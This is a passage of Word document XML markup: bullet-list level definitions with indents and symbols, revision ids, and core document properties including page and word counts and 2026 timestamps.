      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="114E5530" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="646E2D18" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="78DE5CEE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B3A41AFA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5B16CDFE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="43EE841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55A"/>
    <w:rsid w:val="001D1CE9"/>
    <w:rsid w:val="001D355A"/>
    <w:rsid w:val="002854A7"/>
    <w:rsid w:val="00351BBC"/>
    <w:rsid w:val="0075368A"/>
    <w:rsid w:val="00923028"/>
    <w:rsid w:val="00A77009"/>
    <w:rsid w:val="00AB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5A8A8"/>
  <w15:docId w15:val="{57DC3F5A-FEE7-4EEA-A6D6-62F265A0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13</Pages>
  <Words>1733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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-09-29T00:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-29T04:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>